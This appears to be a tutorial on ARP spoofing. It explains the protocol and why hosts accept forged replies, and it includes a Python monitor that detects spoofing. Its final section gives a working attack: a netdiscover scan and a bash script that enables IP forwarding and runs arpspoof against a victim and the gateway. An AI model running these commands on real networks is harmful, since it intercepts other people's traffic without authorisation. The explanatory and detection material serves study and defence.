ARP Spoofing

ARP (Address Resolution Protocol) is a protocol of the TCP/IP model; its purpose is to translate IP addresses to MAC addresses and vice versa.

[Figure: tcpip]

Each host has an ARP table with entries of IP/MAC associations for the other known hosts on the local network. To check the ARP table on your host, run:

arp -a

How the ARP protocol works:

[Figure: arp1]

The client sends an ARP request in broadcast:

[Figure: arp2]

Only the host that has that IP address replies to the client:

[Figure: arp3]

In the ARP spoofing attack, the attacker tells the victim that he is the gateway and tells the gateway that he is the other host, then forwards the packets between both of them.

[Figure: arpattack]

ARP spoofing is possible because:
- Clients accept arbitrary (unsolicited) ARP responses
- Clients do not verify whether the responses are authentic
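Because hosts accept any reply, the only practical defence on a plain LAN is to watch for the pattern the attack leaves: an IP (typically the gateway's) being re-announced from a different MAC, and one MAC claiming several IPs. The monitor below is an added example, not code from the original page; it runs over a constructed list of observed ARP replies, and the addresses and MACs in it are illustrative only.

```python
# Added example (not from the original page): a small ARP-reply monitor that
# flags the signature an ARP spoofing attack leaves on the wire. It consumes a
# list of already-observed (sender_ip, sender_mac) pairs; no packets are captured.

from collections import defaultdict

# Constructed sample of ARP replies in the order they were observed.
SAMPLE_REPLIES = [
    ("10.0.0.1", "aa:aa:aa:aa:aa:01"),  # real gateway answers
    ("10.0.0.2", "aa:aa:aa:aa:aa:02"),  # real client answers
    ("10.0.0.1", "cc:cc:cc:cc:cc:03"),  # a third MAC now claims the gateway IP
    ("10.0.0.2", "cc:cc:cc:cc:cc:03"),  # the same MAC also claims the client IP
]


def monitor_arp(replies, gateway_ip="10.0.0.1"):
    """Return a list of alert strings for suspicious ARP replies.

    Rule 1: an IP previously mapped to MAC X is announced from MAC Y.
    Rule 2: a single MAC announces itself as more than one IP, one of them
            being the gateway (the man-in-the-middle position).
    """
    ip_to_mac = {}                 # learned IP -> MAC associations
    mac_to_ips = defaultdict(set)  # which IPs each MAC has claimed
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        old = ip_to_mac.get(ip)
        if old is not None and old != mac:
            alerts.append(f"ip {ip} changed from {old} to {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1 and gateway_ip in mac_to_ips[mac]:
            others = sorted(mac_to_ips[mac] - {gateway_ip})
            alerts.append(f"mac {mac} claims gateway {gateway_ip} and {others}")
    return alerts


if __name__ == "__main__":
    for line in monitor_arp(SAMPLE_REPLIES):
        print("ALERT:", line)
```

Rule 1 alone also fires on legitimate events such as a NIC replacement or DHCP reassigning an address, so in practice it is worth pairing with Rule 2 or with a static entry for the gateway.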

Performing an attack

Discover the network

netdiscover -r 10.0.0.0/24

#!/bin/bash
# arpspoof_attack.sh
# Addresses below are the example values from the page.

INTERFACE=eth0
MY_ADDRESS=10.0.0.3
VICTIM_ADDRESS=10.0.0.2
GATEWAY_ADDRESS=10.0.0.1

# Enable IP forwarding so packets are relayed between the two hosts.
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i "$INTERFACE" -t "$VICTIM_ADDRESS" "$GATEWAY_ADDRESS" &
arpspoof -i "$INTERFACE" -t "$GATEWAY_ADDRESS" "$VICTIM_ADDRESS"